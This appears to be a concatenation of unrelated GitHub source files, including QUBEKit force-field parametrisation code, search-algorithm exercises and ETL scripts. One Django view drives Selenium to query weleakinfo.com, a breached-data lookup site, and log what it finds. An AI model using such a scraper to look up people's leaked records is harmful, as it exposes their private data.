end of the torsion object\n for key in improper_torsions.keys():\n self.molecule.PeriodicTorsionForce[key] = improper_torsions[key]\n\n def get_gaff_types(self, fftype='gaff', file=None):\n \"\"\"Convert the pdb file into a mol2 antechamber file and get the gaff atom types\n and gaff bonds if there were \"\"\"\n\n # call Antechamber to convert if we don't have the mol2 file\n if file is None:\n cwd = getcwd()\n\n # do this in a temp directory as it produces a lot of files\n pdb = path.abspath(self.molecule.filename)\n mol2 = path.abspath(f'{self.molecule.name}.mol2')\n file = mol2\n\n with TemporaryDirectory() as temp:\n chdir(temp)\n copy(pdb, 'in.pdb')\n\n # call antechamber\n with open('Antechamber.log', 'w+') as log:\n sub_run(f'antechamber -i in.pdb -fi pdb -o out.mol2 -fo mol2 -s 2 -at '\n f'{fftype} -c bcc', shell=True, stdout=log)\n\n # Ensure command worked\n if not path.exists('out.mol2'):\n raise FileNotFoundError('out.mol2 not found antechamber failed!')\n\n\n # now copy the file back from the folder\n copy('out.mol2', mol2)\n chdir(cwd)\n\n # Get the gaff atom types and bonds in case we don't have this info\n gaff_bonds = {}\n with open(file, 'r') as mol_in:\n atoms = False\n bonds = False\n for line in mol_in.readlines():\n\n # TODO Surely this can be simplified?!\n if '@ATOM' in line:\n atoms = True\n continue\n elif '@BOND' in line:\n atoms = False\n bonds = True\n continue\n elif '@SUBSTRUCTURE' in line:\n bonds = False\n continue\n if atoms:\n self.gaff_types[self.molecule.atom_names[int(line.split()[0]) - 1]] = str(line.split()[5])\n if bonds:\n try:\n gaff_bonds[int(line.split()[1])].append(int(line.split()[2]))\n except KeyError:\n gaff_bonds[int(line.split()[1])] = [int(line.split()[2])]\n\n append_to_log(f'GAFF types: {self.gaff_types}', msg_type='minor')\n\n # Check if the molecule already has bonds; if not apply these bonds\n if not list(self.molecule.topology.edges):\n # add the bonds to the molecule\n for key, value in gaff_bonds.items():\n for node in value:\n self.molecule.topology.add_edge(key, node)\n\n self.molecule.update()\n\n # Warning this rewrites the pdb file and re\n # Write a new pdb with the connection information\n self.molecule.write_pdb(input_type='input', name=f'{self.molecule.name}_qube')\n self.molecule.filename = f'{self.molecule.name}_qube.pdb'\n print(f'Molecule connections updated new pdb file made and used: {self.molecule.name}_qube.pdb')\n # Update the input file name for the xml\n self.input_file = f'{self.molecule.name}.xml'\n\n\n@for_all_methods(timer_logger)\nclass XML(Parametrisation):\n \"\"\"Read in the parameters for a molecule from an XML file and store them into the molecule.\"\"\"\n\n def __init__(self, molecule, input_file=None, fftype='CM1A/OPLS', mol2_file=None):\n\n super().__init__(molecule, input_file, fftype, mol2_file)\n\n self.get_gaff_types(fftype='gaff', file=mol2_file)\n self.serialise_system()\n self.gather_parameters()\n self.molecule.parameter_engine = 'XML input ' + self.fftype\n\n def serialise_system(self):\n \"\"\"Serialise the input XML system using openmm.\"\"\"\n\n pdb = app.PDBFile(self.molecule.filename)\n modeller = app.Modeller(pdb.topology, pdb.positions)\n\n if self.input_file:\n forcefield = app.ForceField(self.input_file)\n else:\n try:\n forcefield = app.ForceField(self.molecule.name + '.xml')\n except FileNotFoundError:\n raise FileNotFoundError('No .xml type file found.')\n\n system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.NoCutoff, constraints=None)\n\n xml = XmlSerializer.serializeSystem(system)\n with open('serialised.xml', 'w+') as out:\n out.write(xml)\n\n\n@for_all_methods(timer_logger)\nclass XMLProtein(Parametrisation):\n \"\"\"Read in the parameters for a protein from the QUBEKit_general XML file and store them into the protein.\"\"\"\n\n def __init__(self, protein, input_file='QUBE_general_pi.xml', fftype='CM1A/OPLS'):\n\n super().__init__(protein, input_file, fftype)\n\n self.serialise_system()\n self.gather_parameters()\n self.molecule.parameter_engine = 'XML input ' + self.fftype\n\n def serialise_system(self):\n \"\"\"Serialise the input XML system using openmm.\"\"\"\n\n pdb = app.PDBFile(self.molecule.filename)\n modeller = app.Modeller(pdb.topology, pdb.positions)\n\n if self.input_file:\n forcefield = app.ForceField(self.input_file)\n else:\n try:\n forcefield = app.ForceField(self.molecule.name + '.xml')\n except FileNotFoundError:\n raise FileNotFoundError('No .xml type file found.')\n\n system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.NoCutoff, constraints=None)\n\n xml = XmlSerializer.serializeSystem(system)\n with open('serialised.xml', 'w+') as out:\n out.write(xml)\n\n def gather_parameters(self):\n \"\"\"This method parses the serialised xml file and collects the parameters ready to pass them\n to build tree.\n \"\"\"\n\n # Try to gather the AtomTypes first\n for i, atom in enumerate(self.molecule.atom_names):\n self.molecule.AtomTypes[i] = [atom, 'QUBE_' + str(i),\n str(self.molecule.molecule['input'][i][0]) + str(i)]\n\n input_xml_file = 'serialised.xml'\n in_root = parse_tree(input_xml_file).getroot()\n\n # Extract all bond data\n for Bond in in_root.iter('Bond'):\n self.molecule.HarmonicBondForce[(int(Bond.get('p1')), int(Bond.get('p2')))] = [Bond.get('d'), Bond.get('k')]\n\n # before we continue update the protein class\n self.molecule.update()\n\n # Extract all angle data\n for Angle in in_root.iter('Angle'):\n self.molecule.HarmonicAngleForce[int(Angle.get('p1')), int(Angle.get('p2')), int(Angle.get('p3'))] = [\n Angle.get('a'), Angle.get('k')]\n\n # Extract all non-bonded data\n i = 0\n for Atom in in_root.iter('Particle'):\n if \"eps\" in Atom.attrib:\n self.molecule.NonbondedForce[i] = [Atom.get('q'), Atom.get('sig'), Atom.get('eps')]\n i += 1\n\n # Extract all of the torsion data\n phases = ['0', '3.141592653589793', '0', '3.141592653589793']\n for Torsion in in_root.iter('Torsion'):\n tor_string_forward = tuple(int(Torsion.get(f'p{i}')) for i in range(1, 5))\n tor_string_back = tuple(reversed(tor_string_forward))\n\n if tor_string_forward not in self.molecule.PeriodicTorsionForce.keys() and tor_string_back not in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_forward] = [\n [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]]]\n elif tor_string_forward in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_forward].append(\n [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])\n elif tor_string_back in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_back].append([Torsion.get('periodicity'),\n Torsion.get('k'), phases[\n int(Torsion.get('periodicity')) - 1]])\n # Now we have all of the torsions from the openMM system\n # we should check if any torsions we found in the molecule do not have parameters\n # if they don't give them the default 0 parameter this will not change the energy\n for tor_list in self.molecule.dihedrals.values():\n for torsion in tor_list:\n # change the indexing to check if they match\n param = tuple(torsion[i] - 1 for i in range(4))\n if param not in self.molecule.PeriodicTorsionForce.keys() and tuple(\n reversed(param)) not in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[param] = [['1', '0', '0'], ['2', '0', '3.141592653589793'],\n ['3', '0', '0'], ['4', '0', '3.141592653589793']]\n\n # Now we need to fill in all blank phases of the Torsions\n for key in self.molecule.PeriodicTorsionForce.keys():\n vns = ['1', '2', '3', '4']\n if len(self.molecule.PeriodicTorsionForce[key]) < 4:\n # now need to add the missing terms from the torsion force\n for force in self.molecule.PeriodicTorsionForce[key]:\n vns.remove(force[0])\n for i in vns:\n self.molecule.PeriodicTorsionForce[key].append([i, '0', phases[int(i) - 1]])\n # sort by periodicity using lambda function\n for key in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[key].sort(key=lambda x: x[0])\n\n # now we need to tag the proper and improper torsions and reorder them so the first atom is the central\n improper_torsions = OrderedDict()\n for improper in self.molecule.improper_torsions:\n for key in self.molecule.PeriodicTorsionForce:\n # for each improper find the corresponding torsion parameters and save\n if sorted(key) == sorted(tuple([x - 1 for x in improper])):\n # if they match tag the dihedral\n self.molecule.PeriodicTorsionForce[key].append('Improper')\n # replace the key with the strict improper order first atom is center\n improper_torsions[tuple([x - 1 for x in improper])] = self.molecule.PeriodicTorsionForce[key]\n\n torsions = deepcopy(self.molecule.PeriodicTorsionForce)\n # now we should remake the torsion store in the ligand\n self.molecule.PeriodicTorsionForce = OrderedDict((v, k) for v, k in torsions.items() if k[-1] != 'Improper')\n # now we need to add the impropers at the end of the torsion object\n for key in improper_torsions.keys():\n self.molecule.PeriodicTorsionForce[key] = improper_torsions[key]\n\n\n@for_all_methods(timer_logger)\nclass AnteChamber(Parametrisation):\n \"\"\"\n Use AnteChamber to parametrise the Ligand first using gaff or gaff2\n then build and export the xml tree object.\n \"\"\"\n\n def __init__(self, molecule, input_file=None, fftype='gaff', mol2_file=None):\n\n super().__init__(molecule, input_file, fftype, mol2_file)\n\n self.antechamber_cmd()\n self.serialise_system()\n self.gather_parameters()\n self.prmtop = None\n self.inpcrd = None\n self.molecule.parameter_engine = 'AnteChamber ' + self.fftype\n\n def serialise_system(self):\n \"\"\"Serialise the amber style files into an openmm object.\"\"\"\n\n prmtop = app.AmberPrmtopFile(self.prmtop)\n system = prmtop.createSystem(nonbondedMethod=app.NoCutoff, constraints=None)\n\n with open('serialised.xml', 'w+') as out:\n out.write(XmlSerializer.serializeSystem(system))\n\n def antechamber_cmd(self):\n \"\"\"Method to run Antechamber, parmchk2 and tleap.\"\"\"\n\n # file paths when moving in and out of temp locations\n cwd = getcwd()\n input_file = path.abspath(self.molecule.filename)\n mol2 = path.abspath(f'{self.molecule.name}.mol2')\n frcmod_file = path.abspath(f'{self.molecule.name}.frcmod')\n prmtop_file = path.abspath(f'{self.molecule.name}.prmtop')\n inpcrd_file = path.abspath(f'{self.molecule.name}.inpcrd')\n ant_log = path.abspath('Antechamber.log')\n\n # Call Antechamber\n self.get_gaff_types(fftype=self.fftype)\n\n # Work in temp directory due to the amount of files made by antechamber\n with TemporaryDirectory() as temp:\n chdir(temp)\n copy(mol2, 'out.mol2')\n\n\n # Run parmchk\n with open('Antechamber.log', 'a') as log:\n sub_run(f\"parmchk2 -i out.mol2 -f mol2 -o out.frcmod -s {self.fftype}\", shell=True, stdout=log)\n\n # Ensure command worked\n if not path.exists('out.frcmod'):\n raise FileNotFoundError('out.frcmod not found parmchk2 failed!')\n\n # Now get the files back from the temp folder\n copy('out.mol2', mol2)\n copy('out.frcmod', frcmod_file)\n copy('Antechamber.log', ant_log)\n\n # Now we need to run tleap to get the prmtop and inpcrd files\n with TemporaryDirectory() as temp:\n chdir(temp)\n copy(mol2, 'in.mol2')\n copy(frcmod_file, 'in.frcmod')\n copy(ant_log, 'Antechamber.log')\n\n # make tleap command file\n with open('tleap_commands', 'w+') as tleap:\n tleap.write(\"\"\"source oldff/leaprc.ff99SB\n source leaprc.gaff\n LIG = loadmol2 in.mol2\n check LIG\n loadamberparams in.frcmod\n saveamberparm LIG out.prmtop out.inpcrd\n quit\"\"\")\n\n # Now run tleap\n with open('Antechamber.log', 'a') as log:\n sub_run('tleap -f tleap_commands', shell=True, stdout=log)\n\n # Check results present\n if not path.exists('out.prmtop') or not path.exists('out.inpcrd'):\n raise FileNotFoundError('Neither out.prmtop nor out.inpcrd found; tleap failed!')\n\n copy('Antechamber.log', ant_log)\n copy('out.prmtop', prmtop_file)\n copy('out.inpcrd', inpcrd_file)\n chdir(cwd)\n\n # Now give the file names to parametrisation method\n self.prmtop = f'{self.molecule.name}.prmtop'\n self.inpcrd = f'{self.molecule.name}.inpcrd'\n\n\n@for_all_methods(timer_logger)\nclass OpenFF(Parametrisation):\n \"\"\"\n This class uses the openFF in openeye to parametrise the molecule using frost.\n A serialised XML is then stored in the parameter dictionaries.\n \"\"\"\n\n def __init__(self, molecule, input_file=None, fftype='frost', mol2_file=None):\n super().__init__(molecule, input_file, fftype, mol2_file)\n\n self.get_gaff_types(mol2_file)\n self.serialise_system()\n self.gather_parameters()\n self.molecule.parameter_engine = 'OpenFF ' + self.fftype\n\n def serialise_system(self):\n \"\"\"Create the OpenMM system; parametrise using frost; serialise the system.\"\"\"\n\n # Load molecule using OpenEye tools\n mol = oechem.OEGraphMol()\n ifs = oechem.oemolistream(self.molecule.filename)\n flavor = oechem.OEIFlavor_Generic_Default | oechem.OEIFlavor_MOL2_Default | oechem.OEIFlavor_MOL2_Forcefield\n ifs.SetFlavor(oechem.OEFormat_MOL2, flavor)\n oechem.OEReadMolecule(ifs, mol)\n oechem.OETriposAtomNames(mol)\n\n # Load a SMIRNOFF small molecule forcefield for alkanes, ethers, and alcohols\n forcefield = ForceField(get_data_filename('forcefield/smirnoff99Frosst.offxml'))\n\n # Create the OpenMM system\n topology = generateTopologyFromOEMol(mol)\n system = forcefield.createSystem(topology, [mol])\n\n # Serialise the OpenMM system into the xml file\n with open('serialised.xml', 'w+') as out:\n out.write(XmlSerializer.serializeSystem(system))\n\n # get the gaff atom types\n self.get_gaff_types()\n\n\n@for_all_methods(timer_logger)\nclass BOSS(Parametrisation):\n \"\"\"\n This class uses the BOSS software to parametrise a molecule using the CM1A/OPLS FF.\n The parameters are then stored in the parameter dictionaries.\n \"\"\"\n\n # TODO make sure order is consistent with PDB.\n def __init__(self, molecule, input_file=None, fftype='CM1A/OPLS'):\n super().__init__(molecule, input_file, fftype)\n\n self.BOSS_cmd()\n self.gather_parameters()\n self.molecule.parameter_engine = 'BOSS ' + self.fftype\n\n def BOSS_cmd(self):\n \"\"\"\n This method is used to call the required BOSS scripts.\n 1 The zmat file with CM1A charges is first generated for the molecule keeping the same pdb order.\n 2 A single point calculation is done.\n \"\"\"\n\n pass\n\n def gather_parameters(self):\n \"\"\"\n This method parses the BOSS out file and collects the parameters ready to pass them\n to build tree.\n \"\"\"\n\n pass\n","repo_name":"jthorton/QUBEKitdev","sub_path":"QUBEKit/parametrisation.py","file_name":"parametrisation.py","file_ext":"py","file_size_in_byte":25366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32292587181","text":"'''\n9375 패션왕 신해빈\n난이도 : 실3\n'''\nimport sys\nfrom collections import defaultdict\n\ninput = sys.stdin.readline\n\nt = int(input().rstrip())\n\nfor _ in range(t):\n wears = defaultdict(list)\n n = int(input().rstrip())\n for i in range(n):\n now = list(map(str, input().rstrip().split()))\n wears[now[1]].append(now[0])\n\n nums = [len(wears[i]) + 1 for i in wears.keys()]\n result = 1\n for num in nums:\n result *= num\n\n print(result - 1)","repo_name":"hyo37009/2022-summer-study","sub_path":"백준/9375 패션왕 신해빈.py","file_name":"9375 패션왕 신해빈.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70819386968","text":"from django.shortcuts import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nimport requests\nfrom urllib.request import Request, urlopen\nfrom itertools import cycle\nimport traceback\n\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nimport os\nimport re\n\n\n\nclass Dashboard(TemplateView):\n\ttemplate_name = \"bot_app/dashboard.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(Dashboard, self).get_context_data(**kwargs)\n\t\t# import pdb; pdb.set_trace()\n\t\turl = 'https://weleakinfo.com/'\n\t\tdriver = webdriver.Chrome('/usr/bin/chromedriver') #path of chromedriver .exe \n\t\tdriver.get(url)\n\t\tsleep(7)\n\t\tform_query = self.request.GET.get('form_query',None)\n\t\tform_type = self.request.GET.get('form_type',None)\n\n\t\tprint(form_query, \" *****form_query*****\")\n\t\tprint(form_type, \" @@@@@form_type@@@@@\")\n\n\t\t\n\n\t\tif form_query and form_type:\n\t\t\tquery = driver.find_element_by_name('query')\n\t\t\ttype_q = driver.find_element_by_name('type')\n\n\t\t\tif form_query:\n\t\t\t\tquery.send_keys(form_query)\n\n\t\t\tif form_type:\n\t\t\t\ttype_q.send_keys(form_type)\n\n\t\t\tdriver.find_element_by_name('search').click()\n\t\t\tsleep(5)\n\t\t\tres = driver.find_element_by_id('result')\n\t\t\tres_txt = res.text\n\n\t\t\tres1 = driver.find_element_by_css_selector('.poorfag')\n\t\t\tres1_txt = res1.text\n\t\t\tres_err = None\n\t\t\tif res1_txt:\n\t\t\t\tresult = { \n\t\t\t\t\t\t\"query_time\": res_txt,\n\t\t\t\t\t \t\"database\" : res1_txt,\n\t\t\t\t\t }\n\t\t\telse:\n\t\t\t\tres_err = driver.find_element_by_css_selector('.alert.alert-danger.warning')\n\t\t\t\tres_err_txt = res_err.text\n\t\t\t\tresult = None\n\t\t\t\n\t\t\tprint(result)\n\t\t\tif result:\n\t\t\t\tsave_output(result,form_query,form_type)\n\t\t\n\t\treturn context\n\n\n\ndef save_output(result,query_term,query_type):\n\n\tfile_name = \"output.txt\"\n\tis_exists = os.path.exists(file_name)\n\tquery_time = re.findall(r'Query Time: ([0-9]+(?:\\.[0-9]+)?)(?:\\s)',result[\"query_time\"])\n\ttotal_hits = re.findall(r\"Total: ([0-9]+(?:\\.[0-9]+)?)(?:\\s)\", result[\"query_time\"])\n\twebsite_no = re.findall(r\"([0-9]+) Website\",result[\"query_time\"])\n\tno_of_results = re.findall(r\"Found ([0-9]+)\", result[\"database\"])\n\tdatabase = re.findall(r\"results in (.+)\", result[\"database\"])\n\n\tif len(database)<=0:\n\t\tdatabase = re.findall(r\"result in (.+)\", result[\"database\"])\n\n\n\tif is_exists:\n\t\twith open(file_name,'a') as fp:\n\t\t\tdata = query_term+\"\\t\"+query_type+\"\\t\"+str(query_time[0])+\"\\t\"+str(total_hits[0])+\"\\t\"+str(website_no[0])+\"\\t\"+str(no_of_results[0])+\"\\t\"+str(database[0])+\"\\n\"\n\t\t\tprint(\"data \", data)\n\t\t\tfp.write(data)\n\n\telse:\n\t\twith open(file_name, 'w+') as fp:\n\t\t\tcolumn_names = \"query_term\\tquery_type\\tquery_time\\ttotal_hits\\twebsite_no\\tno_of_results\\tdatabase\\n\"\n\t\t\tdata = query_term+\"\\t\"+query_type+\"\\t\"+str(query_time[0])+\"\\t\"+str(total_hits[0])+\"\\t\"+str(website_no[0])+\"\\t\"+str(no_of_results[0])+\"\\t\"+str(database[0])+\"\\n\"\n\t\t\tfp.write(column_names)\n\t\t\tfp.write(data)\n\n\n\n\n\n\t","repo_name":"Kajalwaldiya/scraper-bot","sub_path":"bot_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72839665368","text":"import configparser\nimport psycopg2\nfrom sql_queries import copy_table_queries, insert_table_queries, get_sample_table_queries,create_table_queries, drop_table_queries\nimport argparse\nimport pandas as pd\n\ndef drop_tables(cur, conn):\n \"\"\"\n \"\"\"\n for query in drop_table_queries:\n print(query)\n cur.execute(query)\n conn.commit()\n\n\ndef create_tables(cur, conn):\n \"\"\"\n \"\"\"\n for query in create_table_queries:\n print(query)\n cur.execute(query)\n conn.commit()\n\ndef load_staging_tables(cur, conn):\n \"\"\"\n load staging table from S3 to Redshift\n \"\"\"\n for query in copy_table_queries:\n print(query)\n cur.execute(query)\n conn.commit()\n\n\ndef insert_tables(cur, conn):\n \"\"\"\n use staging table to create fact table & dimension tables\n \"\"\"\n for query in insert_table_queries:\n print(query)\n cur.execute(query)\n conn.commit()\n\ndef get_sample_data(cur, conn):\n \"\"\"\n get sample from the tables\n \"\"\"\n for query in get_sample_table_queries:\n print(query)\n cur.execute(query)\n conn.commit()\n num_fields = len(cur.description)\n field_names = [i[0] for i in cur.description]\n print(cur.fetchall())\n print('---------------------------')\n\nif __name__ == \"__main__\":\n# commandline args\n parser = argparse.ArgumentParser()\n parser.print_help()\n parser.add_argument('-pipeline',required=False, action=\"store_true\",help='create->copy->insert->sample tables')\n parser.add_argument('-create',required=False, action=\"store_true\",help='create table')\n parser.add_argument('-insert',required=False, action=\"store_true\",help='insert table')\n parser.add_argument('-copy',required=False, action=\"store_true\",help='copy table from s3 to redshift')\n parser.add_argument('-sample',required=False, action=\"store_true\",help='get sample date')\n parser.add_argument('-drop',required=False, action=\"store_true\",help='drop tables')\n args = parser.parse_args()\n\n# dwh config\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n# connect database\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n if args.pipeline:\n create_tables(cur,conn) \n load_staging_tables(cur,conn)\n insert_tables(cur, conn)\n get_sample_data(cur, conn)\n elif args.create:\n create_tables(cur,conn)\n elif args.copy:\n load_staging_tables(cur,conn)\n elif args.insert:\n insert_tables(cur, conn)\n elif args.sample:\n get_sample_data(cur, conn)\n elif args.drop:\n drop_tables(cur,conn)\n\n conn.close()","repo_name":"CuteLemon/DataEngineer","sub_path":"DataWarehouse/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73701038809","text":"import sqlite3\nimport csv\n\n#Abrimos el archivo CSV\nf=open('C:UsersAdminDesktopPosiciones.csv','r') \n#Omitimos la linea de encabezado\nnext(f, None)\nreader = csv.reader(f, delimiter=';')\n\n#Crea la BD en la carpeta donde se encuentra el script\nsql = sqlite3.connect('Posiciones.db')\ncur = sql.cursor()\n\n#Creamos la tabla si no existe\ncur.execute('''CREATE TABLE IF NOT EXISTS posiciones\n (posicion int, nombre text, equipo text, tiempo text)''')\n\n#Llenamos la BD con los datos del CSV\nfor row in reader:\n cur.execute(\"INSERT INTO posiciones VALUES (?, ?, ?, ?)\", (row[0], row[1], row[2], row[3]))\n\n#Muestro las filas guardadas en la tabla\nfor row in cur.execute('SELECT * FROM posiciones'):\n print(row)\n\n#Cerramos el archivo y la conexion a la bd\nf.close()\nsql.commit()\nsql.close()","repo_name":"emersondivB0/PyProjects","sub_path":"coursera/Capstone/Datasets/csv2sqlite.py","file_name":"csv2sqlite.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15527936817","text":"\n# File: Search.py\n# Written by: Siqi Lin\n# Date: 2/5/16\n# Class: CMSC 471\n# Instructor: Maksym Morawski\n# Section: 02\n\n#!/usr/bin/python\nfrom queue import PriorityQueue\nfrom collections import deque\nimport sys, getopt\n\nclass Vertex(object):\n\n def __init__(self, vertexName,vertexCost):\n self.vertex_name = vertexName\n self.cost = vertexCost\n\n# File parsing \ndef ReadFile(fileName):\n\n graph = {}\n \n #open the input file to read\n infile = open(fileName, 'r')\n\n #iteate through the file\n for line in infile:\n key = line[0]\n value = Vertex(line[2],line[4])\n if key in graph:\n #assign edges of a node\n graph[key].append(value)\n else:\n graph[key] = [value]\n\n \n # for key, valueList in graph.items():\n # print(\"key\", key, end=\" \")\n # for item in valueList:\n # print(\"Value: \" ,item.vertex_name, end=\":\")\n # print(item.cost)\n \n return graph\n\n# Write to an output file\ndef OutputFile(fileName, path):\n outfile = open(fileName, 'w')\n for item in path:\n outfile.write(item)\n outfile.write(\"\\n\")\n\ndef print_path(path):\n print(\"STARTING TO PRINT PATH\")\n\n for item in path:\n print(item)\n\n# Begin DFS\ndef depth_first_search(graph, start, end,fileName):\n stack = []\n path = []\n visited = []\n\n stack.append(start)\n # if the starting node and the ending node is the same\n if(start == end):\n path.append(start)\n OutputFile(fileName,path)\n return 0\n else:\n try:\n #Ensure that the stack is not empty\n while stack:\n current_vertex = stack.pop()\n if(current_vertex not in graph.keys() and current_vertex != end):\n path.pop()\n current_vertex = stack.pop()\n path.append(current_vertex)\n # a path has been found\n if current_vertex == end:\n OutputFile(fileName,path)\n return 0\n # append to the visited list\n if current_vertex not in visited:\n visited.append(current_vertex)\n for item in graph[current_vertex]:\n stack.append(item.vertex_name)\n # path not found\n except:\n OutputFile(fileName,path)\n# End DFS\n\n# Begin BFS\ndef breadth_first_search(graph, start, end, fileName):\n queue = deque([])\n path = []\n visited = []\n trace = {}\n queue.append(start)\n # if thed starting node and the ending node is the same\n if (start == end):\n path.append(start)\n OutputFile(fileName,path)\n return 0\n else:\n #Ensure the queue is not empty\n while queue:\n try: \n current_vertex = queue.popleft()\n if(current_vertex not in graph.keys() and current_vertex != end):\n current_vertex = queue.popleft()\n # if the path has been found\n if current_vertex == end:\n iterator = current_vertex\n path.append(iterator)\n # Trace back from the current node to the source node\n while iterator != start:\n iterator = trace[iterator]\n path.append(iterator)\n path.reverse()\n OutputFile(fileName,path)\n return 0\n if current_vertex not in visited:\n visited.append(current_vertex)\n for item in graph[current_vertex]:\n #print(\"Before:\",queue)\n #print(\"Item to be appended\", item.vertex_name)\n flag = item.vertex_name in queue\n if not flag:\n queue.append(item.vertex_name)\n trace[item.vertex_name] = current_vertex\n #print(queue)\n #no path has been found\n except:\n OutputFile(fileName,path)\n# End DFS\n\n# Begin UCS\ndef uniform_cost_search(graph, start,end,fileName):\n distance = {}\n #prev is used to trace paths\n prev = {}\n distance[start] = 0\n stack = []\n pQueue = PriorityQueue()\n temp_list = []\n\n for key in graph.keys():\n if key != start:\n # Initializing distance as infinity and previous node as unknown\n distance[key] = 9999\n prev[key] = ''\n # Insert item onto pQueue with priority\n pQueue.put(([distance[key]], key))\n for value in graph[key]:\n if value.vertex_name not in graph.keys():\n if value.vertex_name != start:\n distance[value.vertex_name] = 9999\n prev[value.vertex_name] = ''\n # insert an item onto the priority queue with priority\n pQueue.put(([distance[value.vertex_name]], value.vertex_name))\n\n #print(\"PREV: \", prev)\n\n while not pQueue.empty():\n current_vertex = pQueue.get()[1]\n #return 0\n #loop through the neighbor of the current_vertex\n if current_vertex in graph.keys():\n # tempQueue = PriorityQueue()\n # tempQueue = pQueue\n for neighbor in graph[current_vertex]:\n #calculate the cost needed to go from start to \n temp_cost = distance[current_vertex] + int(neighbor.cost)\n if temp_cost < distance[neighbor.vertex_name] :\n distance[neighbor.vertex_name] = temp_cost\n prev[neighbor.vertex_name] = current_vertex\n temp_list = pQueue.queue\n #decrease priority\n temp_list[0][0][0] = distance[neighbor.vertex_name]\n #print(\"Queue:\",pQueue.queue)\n #print(\"vertex:\", neighbor.vertex_name)\n #print(\"distance:\", distance[neighbor.vertex_name])\n iterator = end\n #print(\"iterator:\" ,iterator)\n #print(\"prev[iterator]:\",prev[iterator])\n while( (iterator != start) and (prev[iterator] != '')):\n print(iterator)\n stack.append(iterator)\n iterator = prev[iterator]\n stack.append(start)\n stack.reverse()\n OutputFile(fileName,stack)\n\n\n return 0\n# End UCS\n\n\ndef main():\n \n map = {}\n\n if len(sys.argv) != 6 :\n print('Usage: python Search.py ', end=\"\")\n print(' ')\n else:\n inputFile = str(sys.argv[1])\n outputFile = str(sys.argv[2])\n startNode = str(sys.argv[3])\n endNode = str(sys.argv[4])\n searchType = str(sys.argv[5])\n\n # file parsing\n map = ReadFile(inputFile)\n\n # perform searches\n if searchType == \"DFS\":\n depth_first_search(map, startNode, endNode,outputFile)\n elif searchType == \"BFS\":\n breadth_first_search(map, startNode, endNode,outputFile)\n elif searchType == \"UCS\":\n uniform_cost_search(map, startNode, endNode,outputFile)\n else:\n print('Usage: python Search.py ', end=\"\")\n print(' ') \n\n\nmain()\n","repo_name":"TBry13/AIProject1","sub_path":"linsiqi1/Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"22837038208","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport importlib\nfrom cosyai.util import check_config_none\n\n\nclass Dataset(object):\n def __new__(cls, conf):\n check_config_none(conf, [\"data_type\"])\n if conf.data_type == \"segy\":\n raise NotImplementedError\n module = importlib.import_module('cosyai.dataset')\n return getattr(module, conf.data_type)(conf)\n\n\nclass _BaseDataset(object):\n def __init__(self, conf):\n super().__init__()\n self.conf = conf\n","repo_name":"ChipSum-Group/CosyAI","sub_path":"cosyai/dataset/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12181789328","text":"import logging\nimport os\n\nimport aiohttp_jinja2\nimport jinja2\nfrom aiojobs.aiohttp import setup as setup_aiojobs\nfrom aiohttp import web, web_middlewares\n\nfrom . import settings\nfrom ..db.models import close_pg, init_pg\nfrom ..db.consumers import register_consumer_in_the_database\nfrom ..db.settings import get_postgres_credentials\nfrom .urls import setup_routes\n\n\"\"\"\nRun either of the following commands from the parent of current directory:\n\nadev runserver consumer --livereload\n\npython3 -m sequence_search.consumer\n\"\"\"\n\n\nasync def on_startup(app):\n # initialize database connection\n await init_pg(app)\n\n # register self in the database\n await register_consumer_in_the_database(app)\n\n # clear queries and results directories\n for name in os.listdir(settings.RESULTS_DIR):\n os.remove(settings.RESULTS_DIR / name)\n\n for name in os.listdir(settings.QUERY_DIR):\n os.remove(settings.QUERY_DIR / name)\n\n for name in os.listdir(settings.INFERNAL_RESULTS_DIR):\n os.remove(settings.INFERNAL_RESULTS_DIR / name)\n\n for name in os.listdir(settings.INFERNAL_QUERY_DIR):\n os.remove(settings.INFERNAL_QUERY_DIR / name)\n\n\ndef create_app():\n logging.basicConfig(level=logging.DEBUG)\n\n app = web.Application(middlewares=[\n web_middlewares.normalize_path_middleware(append_slash=True),\n ], client_max_size=4096**2)\n\n app.update(name='consumer', settings=settings)\n\n # setup Jinja2 template renderer\n aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(str(settings.PROJECT_ROOT / 'templates')))\n\n # get credentials of the correct environment\n for key, value in get_postgres_credentials(settings.ENVIRONMENT)._asdict().items():\n setattr(app['settings'], key, value)\n\n # create db connection on startup, shutdown on exit\n app.on_startup.append(on_startup)\n 